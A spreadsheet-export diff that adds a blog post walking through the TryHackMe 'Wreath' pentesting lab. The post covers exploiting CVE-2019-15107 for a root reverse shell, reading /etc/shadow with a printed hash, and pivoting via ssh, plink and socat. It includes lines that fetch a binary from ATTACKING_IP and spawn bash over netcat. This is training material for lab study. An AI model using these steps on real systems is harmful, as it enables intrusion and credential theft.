<commit_message>
content from frontend summarized with an LLM
</commit_message>
<xml_diff>
--- a/database_export.xlsx
+++ b/database_export.xlsx
@@ -435,7 +435,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:K5"/>
+  <dimension ref="A1:L2"/>
   <sheetViews>
     <sheetView workbookViewId="0">
       <selection activeCell="A1" sqref="A1"/>
@@ -444,16 +444,17 @@
   <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
   <cols>
     <col width="4" customWidth="1" min="1" max="1"/>
-    <col width="13" customWidth="1" min="2" max="2"/>
-    <col width="845" customWidth="1" min="3" max="3"/>
+    <col width="18" customWidth="1" min="2" max="2"/>
+    <col width="18775" customWidth="1" min="3" max="3"/>
     <col width="12" customWidth="1" min="4" max="4"/>
     <col width="12" customWidth="1" min="5" max="5"/>
     <col width="9" customWidth="1" min="6" max="6"/>
     <col width="12" customWidth="1" min="7" max="7"/>
     <col width="12" customWidth="1" min="8" max="8"/>
-    <col width="41" customWidth="1" min="9" max="9"/>
-    <col width="42" customWidth="1" min="10" max="10"/>
-    <col width="41" customWidth="1" min="11" max="11"/>
+    <col width="45" customWidth="1" min="9" max="9"/>
+    <col width="46" customWidth="1" min="10" max="10"/>
+    <col width="45" customWidth="1" min="11" max="11"/>
+    <col width="865" customWidth="1" min="12" max="12"/>
   </cols>
   <sheetData>
     <row r="1">
@@ -512,221 +513,263 @@
           <t>image_url_large</t>
         </is>
       </c>
+      <c r="L1" s="1" t="inlineStr">
+        <is>
+          <t>summary</t>
+        </is>
+      </c>
     </row>
     <row r="2">
       <c r="A2" s="2" t="n">
-        <v>16</v>
+        <v>19</v>
       </c>
       <c r="B2" s="2" t="inlineStr">
         <is>
-          <t>Another one</t>
+          <t>WREATH TryHackMe</t>
         </is>
       </c>
       <c r="C2" s="2" t="inlineStr">
         <is>
-          <t>&lt;p&gt;Lets see how this&lt;/p&gt;
-&lt;p&gt;Goes today!!&lt;/p&gt;</t>
+          <t>&lt;h3&gt;&lt;strong&gt;Enumeration &amp;nbsp;&amp;nbsp;&lt;/strong&gt;&lt;/h3&gt;
+&lt;hr&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;Connected to wreath network from provided config file in tryhackme access page. Using my &lt;em&gt;Kali Linux&lt;/em&gt; virtual machine on my own pc for this penetration testing.&amp;nbsp;I started the network on wreath box and my first objective is to conduct reconnaissance.&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/li&gt;
+&lt;li&gt;&amp;nbsp;Enumerated the network to scan all open ports and service versions running first with&amp;nbsp;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre class="language-c"&gt;&lt;code&gt;nmap -p- -sV --open &amp;lt;ip-addr&amp;gt; -oA scans/open-ports&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;&lt;br&gt;Checked Os version with&amp;nbsp;&lt;/p&gt;
+&lt;pre class="language-c"&gt;&lt;code&gt;nmap -O &amp;lt;ipaddr&amp;gt; -oA scans/Os&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;p&gt;However this wasnt feasable since nmap returned too many Os guesses. Found the Os by making a request with curl to the web-server. The Os used is centos.&lt;/p&gt;
+&lt;pre class="language-markup"&gt;&lt;code&gt;curl -I &amp;lt;ip-addr&amp;gt;&lt;/code&gt;&lt;/pre&gt;
+&lt;ul&gt;
+&lt;li&gt;The site in the curl request &lt;code&gt;https://thomaswreath.thm&amp;nbsp;&lt;/code&gt; cannot be resolved with an error "Failed:&amp;nbsp; Name or Service". This seems to be a DNS issue.&lt;/li&gt;
+&lt;li&gt;Added the networks ip address and url to /etc/hosts&amp;nbsp;&lt;code&gt;&amp;lt;ip-addr&amp;gt;&amp;nbsp; &amp;nbsp;thomaswreath.thm&lt;/code&gt; and this resolved the issue.&amp;nbsp;&lt;/li&gt;
+&lt;li&gt;The page doesn't seem to have a certificate and I accepted the risks and logged in. &lt;strong&gt;Footprinting &lt;/strong&gt;is actually a recommended approach in the real world when encountering websites without certificates.&amp;nbsp;&lt;/li&gt;
+&lt;li&gt;Footprinting a technique that involves gathering information about a target system or network to identify potential entry points and vulnerabilities for an attack.&lt;/li&gt;
+&lt;li&gt;On further research of the services running on the ports by looking if they have a cve document, I found that port 10000 has a Remote Code Excecution vulnerability. This is really good news! The CVE report is &lt;strong&gt;CVE-2019-15107&lt;/strong&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;h3&gt;&lt;strong&gt;EXPLOITATION&lt;/strong&gt;&lt;/h3&gt;
+&lt;hr&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;An exploit for this vulnerability is found on&amp;nbsp;&lt;code&gt;https://github.com/MuirlandOracle/CVE-2019-15107&lt;/code&gt; . CLoned the repository&amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;git clone https://github.com/MuirlandOracle/CVE-2019-15107.git&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;navigated into it and found a python script. Elecated priviledges of the script by running&amp;nbsp;&lt;/p&gt;
+&lt;pre class="language-markup"&gt;&lt;code&gt;chmod 700 CVE-2019-15107.py&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;and then attacking the vulnerable machine with&lt;/p&gt;
+&lt;pre class="language-markup"&gt;&lt;code&gt;./CVE-2019-15107.py &amp;lt;ip-addr&amp;gt;&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;This successfully connects to the machine and on running a few basic commands we can establish that it is indeed a linux distro. We can check the distro info by running&amp;nbsp;&lt;/p&gt;
+&lt;pre class="language-markup"&gt;&lt;code&gt;cat /etc/os-release&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;We indeed see it's &lt;strong&gt;CentOS Linux. &lt;/strong&gt;We can see check the user by running &lt;code&gt;whoami&lt;/code&gt; and we can see the server is running as &lt;strong&gt;root.&lt;/strong&gt; This is good news since root is a superuser!&lt;/p&gt;
+&lt;/li&gt;
+&lt;li&gt;To establish a full reverse shell into my machine we can type&lt;strong&gt; &lt;/strong&gt;&lt;code&gt;shell&lt;/code&gt;&lt;strong&gt; &lt;/strong&gt;on the program to begin reverse shell initialization. Place your THM openvpn ip-addr and the desired port you want to connect to on your machine. This only works for UNIX systems and since I'm using Kali, I'm good to go.&lt;/li&gt;
+&lt;li&gt;Next set up a listener on your machine, I choose port 9001&amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;nc -lvnp 9001&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;Once listening initiate the reverse shell from the running&amp;nbsp;&lt;em&gt;./CVE-2019-15107.py &amp;lt;ip-addr&amp;gt; &lt;/em&gt;script and you're good to go.&amp;nbsp;&lt;/p&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;p&gt;We are in!&lt;/p&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;h4&gt;&lt;strong&gt;SHELL STABILIZATION(OPTIONAL)&lt;/strong&gt;&lt;/h4&gt;
+&lt;hr&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;The reverse shell looks a bit choppy so we could optionally stabilise it. I love beautiful terminals and aesthetics so I'll do it.&lt;/li&gt;
+&lt;li&gt;This is mostly done through python which comes pre-installed in most if not all linux distros. All you have to do now is run the command.. oh wait before we run the command we have to check the python version in our system by running either of these &amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;python3 --version
+python2 --version
+python --version&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;whichever returns a valid python version is the one we'll use it's recommended to use the latest one. The latest systems however will be running python3. After confirming the python version run the command, in my case I'll run&lt;/p&gt;
+&lt;pre class="language-markup"&gt;&lt;code&gt;python3 -c 'import pty;pty.spawn("/bin/bash")'&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;Which will make us switch to bash. Now we are getting somewhere. We still need to make it look prettier and add some more functionality. To enhance our shell even more we run&amp;nbsp;&lt;/p&gt;
+&lt;pre class="language-markup"&gt;&lt;code&gt;export TERM=xterm&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;This will give us to basic linux commands like &lt;strong&gt;clear&lt;/strong&gt;. And now for the most important part to get tab autocompletes and arrow key functionality, we first background the shell session using Ctrl + Z then run&amp;nbsp;&lt;/p&gt;
+&lt;pre class="language-markup"&gt;&lt;code&gt;stty raw -echo; fg&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;This turns off our own terminal echo (&lt;em&gt;gives tab, arrow and Ctr + C&amp;nbsp; functions&lt;/em&gt;) and then foregrounds our shell session.&lt;/p&gt;
+&lt;/li&gt;
+&lt;li&gt;Another way is using &lt;strong&gt;rlwrap &lt;/strong&gt;which gives us history, tab and arrow functions from the get go after initialising a shell using netcat. It does not come pre-installed on Kali therefore you have to run&amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;sudo apt install rlwrap&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;Afterwards you can simple insert it before your netcat command&amp;nbsp;&lt;/p&gt;
+&lt;pre class="language-markup"&gt;&lt;code&gt;rlwrap nc -lvnp &amp;lt;port&amp;gt;&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;This mostly preferred if you are attacking a windows machine since their shells are hectic to stabilise.&lt;/p&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;h3&gt;&lt;strong&gt;EXPLOITATION (&lt;em&gt;continuation...)&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
+&lt;hr&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;We now proceed to view all users along with their &lt;em&gt;username, userid(UID), groupid(GUID), &lt;/em&gt;&lt;em&gt;user description, home directory&lt;/em&gt; and which shell they are assigned. &amp;nbsp;We are root, so we can do this swiftly without permission errors by running&amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;cat /etc/passwd
+&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;You can view only the usernames by running&lt;/p&gt;
+&lt;pre class="language-markup"&gt;&lt;code&gt;cut -d: -f1 /etc/passwd
+&lt;/code&gt;&lt;/pre&gt;
+&lt;/li&gt;
+&lt;li&gt;Since we are root we can view one of the many files that is only readable by the account which is the &lt;strong&gt;shadow &lt;/strong&gt;file. This file contains &lt;em&gt;users password hashes, last password change, min password age, password expiration, account inactivity period and account expiry date&lt;/em&gt;. You can view this file by running&amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;sudo cat /etc/shadow
+&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;We can see root's password hash is &lt;strong&gt;$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRV Nq6/6g0PxK9VqSdy47/qKXad1::0:99999:7:::&amp;nbsp;&lt;/strong&gt;This is format is used in most linux systems. It's a sha-512 with a salt and I can confidently say it's uncrackable, unless of course you've pissed off the FBI. The last part&amp;nbsp; &lt;strong&gt;::0:99999:7:::&lt;/strong&gt; is the password aging information, which includes the following fields:&lt;br&gt;&amp;nbsp; &amp;nbsp; + `0`: The minimum number of days before the password can be changed.&lt;br&gt;&amp;nbsp; &amp;nbsp; + `99999`: The maximum number of days before the password must be changed.&lt;br&gt;&amp;nbsp; &amp;nbsp; + `7`: The number of days before the password expires that the user will be warned.&lt;/p&gt;
+&lt;/li&gt;
+&lt;li&gt;We can also see that there is another user &lt;strong&gt;twreath &lt;/strong&gt;with the a password hash.&lt;/li&gt;
+&lt;li&gt;Since we can't crack the password we need to find some other form of authentication that can allow us to access to the system. One of the most used authentication methods is ssh. Finding an ssh private key can be golden since we can always access the shell remotely anytime. We can run the following command to search for ssh files&amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;sudo find / -name ".ssh" 2&amp;gt;/dev/null
+&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;This command searches for any file or directory with the name &lt;strong&gt;.ssh.&lt;/strong&gt;We've found a match in &lt;em&gt;/root/.ssh. &lt;/em&gt;This directory stores public and private keys for root. Now that we've found the ssh keys for root we can connect to the system as root anytime.&lt;/p&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;h3&gt;&lt;strong&gt;PIVOTING&lt;/strong&gt;&lt;/h3&gt;
+&lt;hr&gt;
+&lt;ul&gt;
+&lt;li&gt;Pivoting is using a compromised system to gain access to other systems in the network. Methods of pivoting include&amp;nbsp;&lt;strong&gt;Tunnelling/proxying &lt;/strong&gt;and &lt;strong&gt;Port Forwarding&lt;/strong&gt;&lt;/li&gt;
+&lt;li&gt;&lt;em&gt;Tunnelling routes &lt;/em&gt;all traffic into the target network by creating a proxy type connection through a compromised system.&amp;nbsp;Double tunneling through other protocols like&amp;nbsp;&lt;em&gt;ssh&lt;/em&gt; can make this even less conspicous. Tunnelling is best for redirecting different types pf traffic into the network or to access multiple ports on various systems&lt;/li&gt;
+&lt;li&gt;&lt;em&gt;Port Forwarding &lt;/em&gt;creates a connection between a local port and the target system via a compromised machine. It tends to be more reliable and quick to setup. The only setback is its lack of scalability.&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;h3&gt;&lt;strong&gt;ENUMERATION II&lt;/strong&gt;&lt;/h3&gt;
+&lt;hr&gt;
+&lt;ul&gt;
+&lt;li&gt;As the saying goes Information is Power! The more we know about our target the easier it is to exploit them.&amp;nbsp;
+&lt;p&gt;There are five possible ways to enumerate a network through a compromised host:&lt;/p&gt;
+&lt;ol&gt;
+&lt;li&gt;Using material found on the machine. The hosts file or&amp;nbsp;&lt;span class="glossary-term" data-testid="glossary-term"&gt;ARP&lt;/span&gt;&amp;nbsp;cache, for example&lt;/li&gt;
+&lt;li&gt;Using pre-installed tools&lt;/li&gt;
+&lt;li&gt;Using statically compiled tools&lt;/li&gt;
+&lt;li&gt;Using scripting techniques&lt;/li&gt;
+&lt;li&gt;Using local tools through a proxy&lt;/li&gt;
+&lt;/ol&gt;
+&lt;/li&gt;
+&lt;li&gt;&lt;strong&gt;Nmap scan&lt;/strong&gt; and &lt;strong&gt;&lt;code&gt;arp -a&lt;/code&gt;&lt;/strong&gt; are a good way to begin. arp -a pings ip addresses on a network and the devices respomd with their mac addresses.&lt;/li&gt;
+&lt;li&gt;Static mapping can be found on &lt;strong&gt;/etc/hosts &lt;/strong&gt;on &lt;em&gt;Linux &lt;/em&gt;and &lt;strong&gt;C:\Windows\System32\drivers\etc\hosts &lt;/strong&gt;on &lt;em&gt;Windows.&amp;nbsp;&lt;/em&gt;&lt;/li&gt;
+&lt;li&gt;&lt;strong&gt;/etc/resolv.conf&lt;/strong&gt; on Linux may could potentially reveal local &lt;em&gt;DNS servers. &lt;/em&gt;You can also run the command &lt;strong&gt;&lt;code&gt;nmcli dev show&amp;nbsp;&lt;/code&gt;&lt;/strong&gt;&lt;/li&gt;
+&lt;li&gt;&amp;nbsp;&lt;/li&gt;
+&lt;li&gt;&lt;code&gt;&lt;strong&gt;ipconfig /all&lt;/strong&gt;&lt;/code&gt; on windows checks for &lt;em&gt;DNS Servers &lt;/em&gt;for an interface&amp;nbsp;&lt;/li&gt;
+&lt;li&gt;&amp;nbsp;&lt;/li&gt;
+&lt;li&gt;Static binaries can be found on&amp;nbsp;&lt;em&gt;https://github.com/andrew-d/static-binaries&lt;/em&gt;&lt;/li&gt;
+&lt;li&gt;&amp;nbsp;&lt;/li&gt;
+&lt;li&gt;A static version of nmap can be downloaded on &lt;code&gt;&lt;em&gt;https://github.com/ernw/static-toolbox/releases/download/1.04/nmap-7.80SVN-x86_64-a36a34aa6-portable.zip&lt;/em&gt;&lt;/code&gt;&lt;/li&gt;
+&lt;li&gt;Static binaries are uncompilled therefore they may be able to run on systems easily&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;In a case where nmap is not istalled on the compromised system a bash on line like can do a full ping sweep of the 192.168.1.x network
+&lt;pre class="language-markup"&gt;&lt;code&gt;for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &amp;amp;);
+done&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;Save the script in a file e.g &lt;em&gt;bash-scan.sh&lt;/em&gt;.&amp;nbsp; Make it excecutable&amp;nbsp;&lt;code&gt;chmod 700 bash-scan.sh&lt;/code&gt; and run it &lt;code&gt;./bash-scan.sh&lt;/code&gt;&lt;/p&gt;
+&lt;/li&gt;
+&lt;li&gt;A C# port scanner for windows systems can be found at &lt;code&gt;https://github.com/MuirlandOracle/C-Sharp-Port-Scan&lt;/code&gt;&amp;nbsp;&lt;/li&gt;
+&lt;li&gt;You can port scan all ports on hosts in a network with&amp;nbsp;&lt;em&gt; bash&amp;nbsp;&lt;/em&gt;with the following command
+&lt;pre class="language-markup"&gt;&lt;code&gt;for i in {1..65535}; do (echo &amp;gt; /dev/tcp/192.168.1.1/$i) &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 &amp;amp;&amp;amp; echo $i is open; done&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;This will however take forever!&lt;/p&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;h3&gt;&lt;strong&gt;SSH TUNNELING/PORT FORWARDING&lt;/strong&gt;&lt;/h3&gt;
+&lt;hr&gt;
+&lt;ul&gt;
+&lt;li&gt;&lt;strong&gt;Port forwarding&lt;/strong&gt; using ssh is accomplished by using &lt;strong&gt;-L &lt;/strong&gt;flag. E.g if we have ssh access to &lt;em&gt;10.34.90.7 &lt;/em&gt;and there is a webserver running on &lt;em&gt;10.34.90.12, &lt;/em&gt;we can create a link using the following command&amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;ssh -L 8000:10.34.90.12:80 user@10.34.90.12 -fN&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;We can now access the web server by navigating to &lt;em&gt;localhost:8000. &lt;/em&gt;&lt;strong&gt;-f &lt;/strong&gt;in the command backgrounds the shell and &lt;strong&gt;-N &lt;/strong&gt;informs SSH that there will be no command executions in the connection.&lt;/p&gt;
+&lt;/li&gt;
+&lt;li&gt;&lt;strong&gt;Proxies &lt;/strong&gt;on the other hand are created with the &lt;strong&gt;-D &lt;/strong&gt;flag. &lt;code&gt;-D 5682&lt;/code&gt; will open a port 5682 on your attack box and channel data through it. This can be especially powerfull when used together with proxychains.
+&lt;pre class="language-markup"&gt;&lt;code&gt;ssh -D 5682 user@156.43.2.8 -fN&lt;/code&gt;&lt;/pre&gt;
+&lt;/li&gt;
+&lt;li&gt;&lt;strong&gt;Reverse connections &lt;/strong&gt;are accomplished by creating a ssh keys on a target then copying the public key into your authorized keys file in .shh directory. &lt;strong&gt;ssh-keygen&lt;/strong&gt; to create the keys on target. Copy .pub file contents and before copying it into your authorized keys, add the following line&amp;nbsp;&lt;strong&gt;command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty &lt;/strong&gt;This ensures that no shell connections will be created and that key is only used for port forwarding. You can start the ssh service on any machine by running&amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;sudo systemctl start ssh&lt;/code&gt;&lt;/pre&gt;
+&lt;/li&gt;
+&lt;li&gt;With the key transferred we can do a reverse port forward using the command
+&lt;pre class="language-markup"&gt;&lt;code&gt;ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN&lt;/code&gt;&lt;/pre&gt;
+&lt;/li&gt;
+&lt;li&gt;Modern versions of SSH client can create reverse proxies, the equiavalent of the &lt;strong&gt;-D &lt;/strong&gt;flag.
+&lt;pre class="language-markup"&gt;&lt;code&gt;ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;This opens up a proxy allowing redirection of all traffic on &lt;code&gt;&lt;em&gt;localhost:1337&lt;/em&gt;&lt;/code&gt; into the target network.&lt;/p&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;h3&gt;&lt;strong&gt;PLINK.EXE&lt;/strong&gt;&lt;/h3&gt;
+&lt;hr&gt;
+&lt;ul&gt;
+&lt;li&gt;For &lt;strong&gt;windows systems &lt;/strong&gt;you might want to use &lt;strong&gt;Plink.exe &lt;/strong&gt;which is a windows command line version of the PuTTY SSH client.&lt;/li&gt;
+&lt;li&gt;Since window servers are unlikely to have a running SSH server we can use Plink to transport binaries to the target with this command
+&lt;pre class="language-markup"&gt;&lt;code&gt;cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;The &lt;strong&gt;cmd.exe /c echo y &lt;/strong&gt;is used to start mostly for stabilizing the shell.&lt;/p&gt;
+&lt;/li&gt;
+&lt;li&gt;&amp;nbsp;If we have access to 172.16.0.5 and would like to forward a connection to 172.16.0.10:80 back to port 8000 our own attacking machine (172.16.0.20), we could use this command:
+&lt;pre class="language-markup"&gt;&lt;code&gt;cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N
+&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;You might run into problems if you used&amp;nbsp;&lt;strong&gt;ssh-keygen &lt;/strong&gt;to generate the keys. A Kali tool like &lt;strong&gt;puttygen&lt;/strong&gt; can be used to convert the keys. It can be installed by &lt;strong&gt;apt install putty-tools&lt;/strong&gt;. The resulting &lt;strong&gt;.ppk &lt;/strong&gt;file can then be transferred to the windows machine for remote access.&lt;/p&gt;
+&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h3&gt;&amp;nbsp;&lt;/h3&gt;
+&lt;ul&gt;
+&lt;li&gt;New versions of Plink.exe can be installed on &lt;code&gt;&lt;em&gt;https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html&lt;/em&gt;&lt;/code&gt;&amp;nbsp; and kali has a copy installed at &lt;em&gt;&amp;nbsp;&lt;/em&gt;&lt;code&gt;/usr/share/windows-resources/binaries/plink.exe&lt;/code&gt;&amp;nbsp;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&amp;nbsp;&lt;/p&gt;
+&lt;h3&gt;&lt;strong&gt;SOCAT&lt;/strong&gt;&lt;/h3&gt;
+&lt;hr&gt;
+&lt;ul&gt;
+&lt;li&gt;Socat is great for port forwarding and providing stable linux shells. It is however diffucult to find a system that comes preinstalled with socat. We must therefore install static binaries on our targets.&lt;/li&gt;
+&lt;li&gt;&lt;strong&gt;Linux binary &lt;/strong&gt;can be found at&amp;nbsp;&lt;em&gt;&lt;code&gt;https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat&lt;/code&gt;&lt;/em&gt;&amp;nbsp;&lt;/li&gt;
+&lt;li&gt;&lt;strong&gt;Windows binary&lt;/strong&gt; can be found on &lt;code&gt;&lt;em&gt;https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat&lt;/em&gt;&lt;/code&gt;&amp;nbsp;&lt;/li&gt;
+&lt;li&gt;We can install socat binary on our target by running &lt;code&gt;&lt;strong&gt;sudo python3 -m http.server 80&lt;/strong&gt;&lt;/code&gt; on our Kali machine under the directory with the socat binary. Then on the target we can run&amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;curl ATTACKING_IP/socat -o /tmp/socat-USERNAME &amp;amp;&amp;amp; chmod +x /tmp/socat-USERNAME&lt;/code&gt;&lt;/pre&gt;
+&lt;/li&gt;
+&lt;li&gt;To setup a socat relay to our attacking machine we first start listening with&amp;nbsp;&lt;strong&gt;&lt;code&gt;sudo nc -lvnp 443&lt;/code&gt;&lt;/strong&gt; We then run the following command to initiate the relay and background the process after which we can use ip address and port &lt;code&gt;&lt;em&gt;127.0.0.1:8000&lt;/em&gt;&lt;/code&gt; to execute commands to our attacking machine.
+&lt;pre class="language-markup"&gt;&lt;code&gt;./socat tcp-l:8000 tcp:ATTACKING_IP:443 &amp;amp;&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;You can now run commands like&lt;/p&gt;
+&lt;pre class="language-markup"&gt;&lt;code&gt;./nc 12.0.0.1 8000 -e /bin/bash&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;and forward them to the attacking machine.&lt;/p&gt;
+&lt;/li&gt;
+&lt;li&gt;Other &lt;strong&gt;socat&lt;/strong&gt; port forwarding commands include&amp;nbsp;
+&lt;pre class="language-markup"&gt;&lt;code&gt;./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &amp;amp;&lt;/code&gt;&lt;/pre&gt;
+&lt;p&gt;This opens port &lt;em&gt;33060&lt;/em&gt; on the compromised system and forwards it to port&amp;nbsp;&lt;em&gt; &lt;/em&gt;&lt;em&gt;3306 &lt;/em&gt;on the target &lt;em&gt;172.16.0.5. The &lt;strong&gt;fork&lt;/strong&gt;&amp;nbsp;&lt;/em&gt;option puts every connection into a new process. And the &lt;em&gt;&lt;strong&gt;reuseaddr &lt;/strong&gt;&lt;/em&gt;option keeps the port open after a connection is made.&lt;/p&gt;
+&lt;/li&gt;
+&lt;li&gt;&lt;em&gt;A &lt;strong&gt;quiter socat command&lt;/strong&gt;&amp;nbsp;&lt;/em&gt;to first initialise the following command on our attacking machine&amp;nbsp;&lt;code&gt;&lt;strong&gt;socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &amp;amp;&lt;/strong&gt;&lt;/code&gt; This opens up port &lt;em&gt;8000 &lt;/em&gt;and &lt;em&gt;8001 &lt;/em&gt;creating a local relay. What goes into one port will come out of the other. Next on the compromised server we run &lt;code&gt;&lt;strong&gt;./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &amp;amp;&lt;/strong&gt;&lt;/code&gt;&amp;nbsp; We can for example run the following command to forward the &lt;code&gt;&lt;em&gt;open port 80&lt;/em&gt;&lt;/code&gt; of the compromised system. All we have to do is go to &lt;code&gt;&lt;em&gt;localhost:800&lt;/em&gt;&lt;/code&gt; in our attacking machine's web browser.
+&lt;pre class="language-markup"&gt;&lt;code&gt;./socat tcp:10.50.66.20:8001 tcp:10.200.73.200:80,fork &amp;amp;&lt;/code&gt;&lt;/pre&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</t>
         </is>
       </c>
       <c r="D2" s="2" t="inlineStr">
         <is>
-          <t>Bruteforce</t>
+          <t>Pentesting</t>
         </is>
       </c>
       <c r="E2" s="2" t="n">
-        <v>1</v>
+        <v>6</v>
       </c>
       <c r="F2" s="2" t="n">
         <v>5</v>
       </c>
       <c r="G2" s="3" t="n">
-        <v>45533.34171666491</v>
+        <v>45533.55174903246</v>
       </c>
       <c r="H2" s="3" t="n">
-        <v>45533.43152504829</v>
+        <v>45534.59981778345</v>
       </c>
       <c r="I2" s="2" t="inlineStr">
         <is>
-          <t>/static/images/Another_one_5_small.png</t>
+          <t>/static/images/WREATH_TryHackMe_5_small.png</t>
         </is>
       </c>
       <c r="J2" s="2" t="inlineStr">
         <is>
-          <t>/static/images/Another_one_5_medium.png</t>
+          <t>/static/images/WREATH_TryHackMe_5_medium.png</t>
         </is>
       </c>
       <c r="K2" s="2" t="inlineStr">
         <is>
-          <t>/static/images/Another_one_5_large.png</t>
-        </is>
-      </c>
-    </row>
-    <row r="3">
-      <c r="A3" s="2" t="n">
-        <v>17</v>
-      </c>
-      <c r="B3" s="2" t="inlineStr">
-        <is>
-          <t>Hello World</t>
-        </is>
-      </c>
-      <c r="C3" s="2" t="inlineStr">
-        <is>
-          <t>&lt;pre class="language-python"&gt;&lt;code&gt;class BlogPostInDB(BlogPostBase):
-id: int
-created_at: datetime
-updated_at: Optional[datetime] = None
-user_id: int
-image_url_small: str
-image_url_medium: str
-image_url_large: str
-class Config:
-orm_mode = True&lt;/code&gt;&lt;/pre&gt;</t>
-        </is>
-      </c>
-      <c r="D3" s="2" t="inlineStr">
-        <is>
-          <t>Python</t>
-        </is>
-      </c>
-      <c r="E3" s="2" t="n">
-        <v>0</v>
-      </c>
-      <c r="F3" s="2" t="n">
-        <v>6</v>
-      </c>
-      <c r="G3" s="3" t="n">
-        <v>45533.43629218</v>
-      </c>
-      <c r="H3" s="3" t="n"/>
-      <c r="I3" s="2" t="inlineStr">
-        <is>
-          <t>/static/images/Hello_World_6_small.jpeg</t>
-        </is>
-      </c>
-      <c r="J3" s="2" t="inlineStr">
-        <is>
-          <t>/static/images/Hello_World_6_medium.jpeg</t>
-        </is>
-      </c>
-      <c r="K3" s="2" t="inlineStr">
-        <is>
-          <t>/static/images/Hello_World_6_large.jpeg</t>
-        </is>
-      </c>
-    </row>
-    <row r="4">
-      <c r="A4" s="2" t="n">
-        <v>15</v>
-      </c>
-      <c r="B4" s="2" t="inlineStr">
-        <is>
-          <t>Trial</t>
-        </is>
-      </c>
-      <c r="C4" s="2" t="inlineStr">
-        <is>
